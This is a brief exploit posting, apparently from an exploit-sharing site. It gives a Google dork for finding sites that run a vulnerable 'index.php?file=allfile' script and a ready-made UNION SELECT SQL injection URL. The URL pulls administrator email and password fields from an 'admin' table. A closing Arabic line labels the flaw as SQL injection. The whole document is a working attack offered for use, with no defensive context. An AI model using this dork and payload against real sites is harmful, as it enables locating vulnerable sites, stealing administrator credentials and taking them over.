Google dork: inurl:"index.php?file=allfile"


Exploit:

index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpas sword),5,6,7+from+admin



الثغرة : sql